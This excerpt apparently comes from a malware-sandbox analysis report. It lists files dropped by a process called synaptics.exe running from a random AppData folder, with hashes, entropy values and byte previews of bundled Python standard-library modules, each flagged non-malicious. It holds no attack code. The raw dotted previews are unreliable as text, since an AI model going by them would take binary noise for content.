                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s^...d.Z.d.Z.d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...Z.d.d...Z.e.d...Z.e.d.d...=.e.d...Z.e.d...Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e i.Z!e.e"e.e#i.Z$e%e%e&e&e'e'e(e(e)e*e+e,e-e-e.e.i.Z/e%e0e&e1e'e2e(e3e)e4e+e5e-e6e.e7i.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDeEd.k...r-d.d...ZFeGd.d....zZHeH.Id.....eH.Id.e.......eFeHe.d ....eFeHe.d!....eFeHe.d!....eH.Id"e9......eH.Id#e:......eH.Id$e;......eH.Id%e<......eH.Id&e=......eH.Id'e>......eH.Id(e?......eH.Id)e@......eH.Id*eA......eH.Id+eB......eH.Id,eC......eH.Id-eD......W.d.........n.1...s"w.......Y...eJd.....d.S.d.S.)/z.Internal support module for srei..3......)...MAXREPEAT..MAXGROUPSc........................s&...e.Z.d.Z.d.Z.d.Z.d...f.d.d...Z.....Z.S.)...errorai...Exception raised for invalid regular expressions... Attributes:.. msg: The unformatted error message. pattern: The regular expression pattern. pos: The index in the pattern
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21779
                                                                                                                                                                                                            Entropy (8bit):5.596308317894776
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:BiQ5DWum7nnQBcNr5ZjTL2xsP6HeYHfS/l2b7tAu9o23kZAt2umjtU30TezUpPB9:BiG5K2I6+YKd2b7tX3AAt2usyUx0lI
                                                                                                                                                                                                            MD5:2B4E40C7FF81F20AF70B8A550504F9C5
                                                                                                                                                                                                            SHA1:CD0454BEE7434D14EA9B0F4DE01DAF0F23CE4405
                                                                                                                                                                                                            SHA-256:0B0EC60FD451E3A64DCA3E69006B5C28848E238CE5BC7224466467C5301C160C
                                                                                                                                                                                                            SHA-512:D2271B2BBB3F5DEF106CD16BB2F14E4AA28E8538A069522A5A56C8EEF705F4043F990304E278ED31091E252A885635D9B6EAB413DB6F9536D119629C0E1C5C41
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.T.d.Z.d.Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.e.e.h...Z.e.e.e.e.e.e.e.h...Z.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.d...Z.e.e.f.e.e.f.e.e.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e f.d...Z!e"e#e$e%e&e'e(e)d...Z*e'e#B.e)B.Z+e,e(B.Z-G.d.d...d.e...Z/G.d.d...d...Z0G.d.d...d...Z1G.d.d...d...Z2d.d...Z3d.d ..Z4d!d"..Z5d#d$..Z6d3d&d'..Z7d(d)..Z8d*d+..Z9d4d-d...Z:d/d0..Z;d1d2..Z<d,S.)5z.Internal support module for sre.....)...*z..\[{()*+?^$|z.*+?{Z.0123456789Z.01234567Z.0123456789abcdefABCDEFZ4abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZz. ............................\).z.\a..\bz.\fz.\nz.\rz.\tz.\vz.\\).z.\Ar....z.\Bz.\dz.\Dz.\sz.\Sz.\wz.\Wz.\Z)...i..L..m..s..x..a..t..uc....................@...s....e.Z.d.Z.d.S.)...VerboseN)...__name__..__module__..__qualname__..r....r.....8C:\Users\user\AppData\Local\xFSOj9El1Q\lib\sre_parse.pyr....G...s........r....c
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):44844
                                                                                                                                                                                                            Entropy (8bit):5.571029216641341
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:h653tgqHiJVJd4LRmQPAMN4FM81OVgTkC5Nq9F6:h63tBCJDy9T9NCUM1rqb6
                                                                                                                                                                                                            MD5:9D9E1F026DB26CE3E584EF53D459603D
                                                                                                                                                                                                            SHA1:908B3BD0AE1F942D961EDCEF4C6E2B4F144ECAE1
                                                                                                                                                                                                            SHA-256:635CBB5030224FEC77F4CD903BFAD8AEB53F28DFF9E0E2D93D60C7B114EF0A25
                                                                                                                                                                                                            SHA-512:119C24C021E9908CC4541F6BE987916914F0C5719EC79A74AA5D8FC6117E161463531C4CE39126986A95D817202B4717B1E5A6DB0756C275B85032D69445EF0C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z m!Z!..z.d.d.l.m"Z"..W.n...e#yi......Y.n.w.d.d.l.m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-..d.d.l.m.Z.m/Z/..e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e2j3..Z4e2_4d.d...e2j5.6..D...Z7e8e2d.d...Z9G.d.d...d.e...Z:G.d d!..d!e...Z;G.d"d#..d#e...Z<G.d$d%..d%e...Z=e.j>d&k...r.d.d'l.m?Z?m@Z@..d.d(lAmAZAmBZBmCZC..d.d)lAmDZDmEZEmFZF..d.d.lAZGd.d.lHZHd.d.lIZId.d.lJZJeKZLd*g.ZMeNe.d+..ZOe.ZPe.ZQd,d-..ZRd.d/..ZSd0d1..ZTd2d3..ZUe.d4d5..ZVd6d7..ZWG.d8d9..d9e.d9d:....ZXG.d;d<..d<eXe...ZYG.d=d>..d>e...ZZeYj[f.d.d.d.d?..d@dA..Z\d[e]dBeYj[d.d.d.d.d.dC..dDdE..Z^e\Z_e^Z`G.dFdG..dG..ZadHdI..ZbG.dJdK..dKeA..ZceceZ_deaeZ_ed.d.dBe]e3d.dLdLd.f.dMdN..ZfdOdP..ZgdQZhdRZidSdT..ZjdUdV..Zkeld.eFf.dWdX..ZmdYdZ..Znd.S.)\
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4297
                                                                                                                                                                                                            Entropy (8bit):5.54691676295517
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Wn/f+60wN3EXH9/aowjk0wBoCAEFXOrW6QBeABPl:WeRy3EVBwjk0w+CFXefQBT
                                                                                                                                                                                                            MD5:72F5078E63B50E0175F3429C19A5422A
                                                                                                                                                                                                            SHA1:3EA4971AB966D2400D9AE9027AAF6572B299A8FA
                                                                                                                                                                                                            SHA-256:79F42449E6F2F4B5DE58DE39008786911ADFF171A3099E154353B676A9E9AAED
                                                                                                                                                                                                            SHA-512:568978FDCDA06F1458F4E34963F89B76511F2F5205739513A3216633826F0A08AFECADDBB547FA0737873AE6E4F4B12AC6BCDD0149075413343FE93DDC4773C8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d0........................@...sJ...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z d*Z!d+Z"e"Z#d,Z$d-Z%d.Z&d/Z'd0Z(d-Z)d.Z*d/Z+d1Z,d2Z-d3Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d3Z8d2Z9d.Z:d4Z;d5Z<d6Z=d7Z>d8Z?e.d9f.e.d:f.e.d;f.e.d<f.e.d=f.e.d>f.e.d?f.f.e)d@f.f.e*dAf.f.e+e!B.d:f.e!dBf.e+dCf.f.e-d@f.f.e.dAf.f.e/e"B.d:f.e"dBf.e/dCf.f.e1d@f.f.e2dAf.f.e3e$B.dDf.e$dEf.e3dCf.f.f.Z@dFdG..ZAd2ZBd*ZCd/ZDd3ZEd.ZFd.ZGd.ZHd.ZId.ZJd5ZKd.ZLd.ZMd+ZNd,ZOd.ZPd-ZQd4ZRz.d.dHlST.W.dIS...eT..y$......Y.dIS.w.)JzoConstants/functions for interpreting results of os.stat() and os.lstat()...Suggested usage: from stat import *...................................................c....................C........|.d.@.S.).zMReturn the portion of the file's mode that can be set by. os.chmod().. i..........moder....r.....3C:\Users\user\AppData\Local\xFSOj9El1Q\lib\stat.py..S_IM
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7126
                                                                                                                                                                                                            Entropy (8bit):5.387788363750026
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:8LetNTT8nDlw15VntHYdo5H2vHA4yN/uZ1qkwto:zbTT8nhM5Vth5H2vHA4yN/G1qkwto
                                                                                                                                                                                                            MD5:26FAC96CD31154F71D0FD2B987680C84
                                                                                                                                                                                                            SHA1:5647EAB9AD8ABE49030E0FAF76A4A39B6A16DABA
                                                                                                                                                                                                            SHA-256:0743052B569B05D66104E94FD4AF93E2311F0831C2C72F26746B72466F65C223
                                                                                                                                                                                                            SHA-512:8B40684AFED52E57E4BA7D02CF74DC8E5948A494F4FD39C4FC519B95DC0C74158B6976B3E6148E966607A264E04C7CB476E800DDCD8BC1647E09B0DE5AF27785
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d^*.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.e.e...Z.d.Z.e.d...d...Z.d.Z.d.Z.e.e...e...e...Z.d.d.d...Z.d.d.l.Z.d.d.l.m.Z...i.Z.G.d.d...d...Z.e.......G.d.d...d...Z.d.S.).an...A collection of string constants...Public module variables:..whitespace -- a string containing all ASCII whitespace.ascii_lowercase -- a string containing all ASCII lowercase letters.ascii_uppercase -- a string containing all ASCII uppercase letters.ascii_letters -- a string containing all ASCII letters.digits -- a string containing all ASCII decimal digits.hexdigits -- a string containing all ASCII hexadecimal digits.octdigits -- a string containing all ASCII octal digits.punctuation -- a string containing all ASCII punctuation characters.printable -- a string containing all ASCII characters considered printable..)...ascii_letters..ascii_lowercase..ascii_uppercase..capwords..digits..hexdigits..octdigits..printable..punctuation..whitespace..Formatter..Template.....Nz. .....Z.abcdefg
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17099
                                                                                                                                                                                                            Entropy (8bit):5.696794420690984
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:QORubSi/2orlLbqOf9dzA3gfqtv+ScNDMI7BHMi+yDnuxb3rOyb5:QOkbSi+ors29JlqtvtcNoI7BHzxzra
                                                                                                                                                                                                            MD5:A5F06691191222D84ED211DF9585715A
                                                                                                                                                                                                            SHA1:D9DA097FEEC8A040A35B9A2B15A431837669F51B
                                                                                                                                                                                                            SHA-256:E9BEDB18630C8AD5C3DBC28A2E483DBF65C77F048D9B0B5B365747C9CED7D3CD
                                                                                                                                                                                                            SHA-512:05DA93CD5D9FB9225A037E13E0A5271145D70DFDF5261CA758DDF92C6C6579BAD57639EEBC2B9B1A692CF671B70E0BB2624B00516337B747BE2A1B7A56761B1A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.3.......................@...s....d.Z.d.d.l.m.Z...e.j.d.k.s.J...d.d...Z.e.g.d...e.e.d.d.........Z.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..d+d,..i.d-d...d/d0..d1d2..d3d ..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI..dJdK..dLdM....i.dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\dM..d]dO..d^dQ..d_dS..d`dU..dadW..dbdY..dcd[..ddde..dfdg....i.dhdi..djdk..dldm..dndo..dpdq..drds..dtde..dudg..dvdi..dwdk..dxdm..dydo..dzdq..d{ds..d|d}..d~d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d}..d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):331
                                                                                                                                                                                                            Entropy (8bit):5.139306927317733
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/CbextfvXhzYXcCuYKvg6FraMaVkoopngmIjZAuwkn23h/a8/Zkn:CCyxt35YXcaKvjFrDaVkoeKZApfs8/Zk
                                                                                                                                                                                                            MD5:304426169C0D8114CD1C227E67CF4CBA
                                                                                                                                                                                                            SHA1:9320A3348CC8CAA2089BEF2166C6E28A370A2861
                                                                                                                                                                                                            SHA-256:146D8FC65D5B6FA2CA65F5DC31B09292A4A2A4B4115C2268FD67D0191A5D47F4
                                                                                                                                                                                                            SHA-512:6B4CFA38BA66DD9A39298B203B8E87607F025F5573CC9540BB1715B091501FA74EB6491733376C07C506BBA57866184722563D99837833DF15A423FD79654686
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s,...g.d...Z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.).).Z.calcsize..packZ.pack_into..unpackZ.unpack_fromZ.iter_unpack..Struct..error.....)...*)..._clearcache)...__doc__N)...__all__Z._structr....r......r....r.....5C:\Users\user\AppData\Local\xFSOj9El1Q\lib\struct.py..<module>....s............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):44765
                                                                                                                                                                                                            Entropy (8bit):5.60949676945852
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ru0RXv9Df8N6wQVIGcx35LU1w2mDQkW4Oc+clEJn7Zk199DNSauyP4W3ggSegvc7:S0RXv5sjUeV0kzD+clEoSauLWeOQZcp
                                                                                                                                                                                                            MD5:039E478E9339127F51A71034A805631B
                                                                                                                                                                                                            SHA1:1C96ABB8743B5D4EFDF3F2C16E60411D1302AED6
                                                                                                                                                                                                            SHA-256:8FC25B60C498E8B1B3D71524DFF9471695F131BFE8AF8390C1B9B144ABF7A66F
                                                                                                                                                                                                            SHA-512:22487CDD5E34C141D48BA82868CBC5884D022B8E27ACF6F34FED30B76B5DD6D6FB0F9EEBC373173DF3F71A7363BEBD695109024F691E2BB2852A11A80492A6B0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.S.......................@...sp...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.z.d.d.l.Z.W.n...e.yE......d.Z.Y.n.w.g.d...Z.z.d.d.l.Z.d.d.l.Z.d.Z.W.n...e.ym......d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.Y.n0w.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)..e..*g.d.......G.d.d...d.e+..Z,G.d.d...d.e,..Z-G.d.d...d.e,..Z.e.r.G.d.d...d...Z/G.d.d...d.e0..Z1n.e2e.d.d...Z3e4e.d...r.e.j5Z6n.e.j7Z6e.r.d.Z8d.d...Z9n.g.Z8d.d...Z9d.Z:d.Z;d.Z<d.d...Z=d.d...Z>d.d ..d!d"..Z?d#d$..Z@d.d ..d%d&..ZAG.d'd(..d(eB..ZCd.d.d.d.d)..d*d+..ZDd,d-..ZEd.d/..ZFd0d1..ZGd2d3..ZHeH..ZId.ZJG.d4d5..d5..ZKd.S.)6a....Subprocesses with accessible I/O streams..This module allows you to spawn processes, connect to their.input/output/error pipes, and obtain their return codes...For a complete description of this module see the Python documentation...Main API.========.run(...): Runs a command, waits for it to complete, then returns a.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24088
                                                                                                                                                                                                            Entropy (8bit):5.2824353507972965
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:RGeOLQ/N1bmiY+HWkXkYibq1vElkl0kwgbdxXrzpRwJcNrxSejqX1uk:Ye881bminYBmvEKKkwovXbKMdTqX1uk
                                                                                                                                                                                                            MD5:702E3733389976256EFDC27BF455EDEA
                                                                                                                                                                                                            SHA1:6867AFA1D4E7113B7C8DD2F706116F785487E8FD
                                                                                                                                                                                                            SHA-256:11B1207A6A2DCA8B387AB8BF7BF35006B82C9DB0BE3F26344B8D32A7CBF15FE7
                                                                                                                                                                                                            SHA-512:047FA756EF008C855683C340AA58228AD20A159CACDFEDA4CFC7ACFE1A15B9E81513711C24EA023AF06726431A3643B12214D51DA19E3A550C42F30DFF727BE3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dku.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.Z.e.j.e.j.B.e.j.B.Z.e.e.d...rJe.e.j.O.Z.e.Z e.e.d...rVe e.j!O.Z e.e.d...r_e.j"Z"n.d.Z"d.Z#e...Z$d.d...Z%d.d...Z&d.d...Z'G.d.d...d...Z(d.d...Z)d.d...Z*d.a+d.d...Z,d.d...Z-d.d...Z.d.d...Z/d.a0d.d...Z1d d!..Z2d"d#..Z3d?d%d&..Z4d@d'd(..Z5d)e#d.f.d*d+..Z6G.d,d-..d-..Z7G.d.d/..d/..Z8.....2dAd.d3..d4d5..Z9e.j:d6k.s.e.j;d7k.r.e9Z<n.e.e.d8..a=......dBd.d3..d9d:..Z<G.d;d<..d<..Z>G.d=d>..d>..Z?d.S.)Ca....Temporary files...This module provides generic, low- and high-level interfaces for.creating temporary files and directories. All of the interfaces.provided by this module can be used without fear of race conditions.except for 'mktemp'. 'mktemp' is subject to race conditions and.should not be used; it is provided for backward compatibility only...The default path names are returned as str. If you supply bytes as.input, all return values will b
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13836
                                                                                                                                                                                                            Entropy (8bit):5.342272588669743
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:zB47doTOzzlFEYKRuPSzqjNGmwImkWf8FBQ:zB47d3F/5JNG5MkkBQ
                                                                                                                                                                                                            MD5:6E930B97EB61F6F435C3C54071A48561
                                                                                                                                                                                                            SHA1:6FDC4B95C89F2C5174DE15CD04931419181C9FC4
                                                                                                                                                                                                            SHA-256:4C69B35D7C5C8A75F6A950BE368B115614C2CEA3FE66563CA56D5741B83D0F5F
                                                                                                                                                                                                            SHA-512:ABEE24DB977230DF2B3C6068447008E86488934C7E85A9B62D6399F3C500285FFB278420F016D42D5197EDCD5CA0FE43C6E303F278A3339FFEF0853460CE0ABE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d*O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.e...d.e.j...Z.e...d.e.j...Z.d.d...Z.d.d.d...Z.e.d.k.rDe.e.d.......d.S.d.S.).z.Text wrapping and filling.......N)...TextWrapper..wrap..fill..dedent..indent..shortenz...... c....................@...s....e.Z.d.Z.d.Z.i.Z.e.d...Z.e.D.].Z.e.e.e.e...<.q.d.Z.d.Z.d.e...e.....Z.d.e.d.d.......Z.e...d.e.e.e.e.d.....e.j...Z.[.[.[.e...d.e.....Z.[.e...d...Z.....................d&d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d.S.)'r....a..... Object for wrapping/filling text. The public interface consists of. the wrap() and fill() methods; the other methods are just there for. subclasses to override in order to tweak the default behaviour.. If you want to completely replace the main wrapping algorithm,. you'll probably have to override _wrap_chunks()... Several instance attributes control various aspects of wrapping:. width (default:
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):44993
                                                                                                                                                                                                            Entropy (8bit):5.172998404427779
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:I1e/MIxOwAgbSGxwbNNo+rkPsXj16a1Zmi8Y2S41QrTrWOnO8F8+6LcAQJWBpSUW:IA/8Zf2lbPs/v612aOBy4kSUpx05izap
                                                                                                                                                                                                            MD5:20AE0E9E3C8999E2B5DFD03E06A7853E
                                                                                                                                                                                                            SHA1:44EE68F1C47FF28B57D7463F1CF67D0984E9F2DC
                                                                                                                                                                                                            SHA-256:CA3BC3D1D623863C1A1E3C4724C27369209D08CA3A089AD79D2D04E27F056E95
                                                                                                                                                                                                            SHA-512:7E8B8E862547FB27402AAEC2FA80AF29F4D8CBB8268DA1A540592BB1449331FA19BCF4DEC06EB132FFC98957D2C39D091883B6E3AB612E3F991A2CDC8BC7E186
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s6...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...z.d.d.l.m.Z...W.n...e.y=......d.d.l.m.Z...Y.n.w.g.d...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.z.e.j.Z.d.Z.e...d.....W.n...e ye......d.Z.Y.n.w.e.j!Z"z.e.j#Z$W.n...e yy......d.Z$Y.n.w.e.j%Z%[.d.a&d.a'd.d...Z(d.d...Z)d.d...Z*d.d...Z+e.Z,d.d...Z#G.d.d...d...Z-e-Z.G.d.d...d...Z/G.d.d...d...Z0G.d.d...d.e0..Z1G.d.d...d...Z2G.d.d ..d ..Z3G.d!d"..d"e4..Z5e.d#..j6Z7d$d%..Z8e#..a9i.Z:i.Z;e...Z<e...a=e>..a?d&d'..Z@G.d(d)..d)..ZAz.d.d*l.mBaCmDZE..W.n#..e...y.......d.d+lFmGZH..d.d,l.mIZI..eId-d...ZDd/d-..ZEd0d1..aCY.n.w.tCZJd2d3..ZKG.d4d5..d5eA..ZLG.d6d7..d7eA..ZMG.d8d9..d9eA..ZNd:d;..ZOd<d=..ZPd>d?..ZQd@dA..ZRdBdC..ZSdDdE..ZTg.ZUd.aVdFdG..ZWd.dHl.mXZX..eM..aYdIdJ..ZZdKdL..Z[z.d.dMl.m\Z]..W.n...e...y.......d.dNl^m]Z]..Y.n.w.dOdP..Z_e`e.dQ....r.e.jae_dR....d.S.d.S.)Sz;Thread module emulating a subset of Java's threading model......N)...monotonic)...WeakSet)...islice..count)...deque)...get_ident
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2762
                                                                                                                                                                                                            Entropy (8bit):5.781184922666707
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lNHWS58lFEOqIlPBJR41nDBzH3ch9C7Q7WnvKQvVgkGQLU:DHWSOFEOb5nIBb3ch9T6qKLU
                                                                                                                                                                                                            MD5:20661FAFA66B97A60C4572F2A9E07BAC
                                                                                                                                                                                                            SHA1:F25A9EB4A02D0D7C9B3A20021E201308AE3D7A05
                                                                                                                                                                                                            SHA-256:08574402FCAB23B3680A2373307C5C66C7061ACE83138275B6F18D44A79C8B69
                                                                                                                                                                                                            SHA-512:3BF4C1122E20D7362BA992FD597FAC0D7EBF6FCCD4744EA0216B22F49890D2AE4734EBAA54C59616A7E30FD12C5488D87FAFEC3166D4562D19686B4B6CB3BC7C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sF...d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCZCdDdE..eD...E..D...ZFe..GeF.H......i.dFe...dGe...dHe*..dIe...dJe+..dKe...dLe...dMe...dNe%..dOe0..dPe(..dQe...dRe&..dSe...dTe...dUe'..dVe5..i.dWe...dXe6..dYe...dZe1..d[e2..d\e)..d]e...d^e7..d_e...d`e...dae#..dbe...dce...dde...dee...dfe...dge ....e$e/e3e4e.e.e"e-e.e.e,e.e!dh....ZIdidj..ZJdkdl..ZKdmdn..ZLdoS.)pz.Token constants.)...tok_name..ISTERMINAL..ISNONTERMINAL..ISEOF................................................................................................................................................................. ....!...."....#....$....%....&....'....(....)....*....+....,....-........./....0....1....2....3....4....5....6....7....8....9....:....;....<....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17218
                                                                                                                                                                                                            Entropy (8bit):5.78051163472385
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:mSAswuiCpcPm6mE93/w3CNgM/0n/JM7XHVOBnaH:mmiZPm3E93/wyNgM/EElOBnaH
                                                                                                                                                                                                            MD5:0209B4EA02BBE5A8B2CBBD850ADB35B3
                                                                                                                                                                                                            SHA1:C8415ADE9991E4DA7CCAA3A8FAE82451FE631529
                                                                                                                                                                                                            SHA-256:BCFD2AD06B0D5AC3A9A1038BBAA414DA535279A9D05547E190D7141DECCA6ED0
                                                                                                                                                                                                            SHA-512:65CDB54189CB501752B410A721173ADFFEFB8880069960F06D1AB42FDF3016407A664C9FB9D2E7D5CF114059F99F46103F8E6A4CFB25E32E43BD35B1C8640712
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
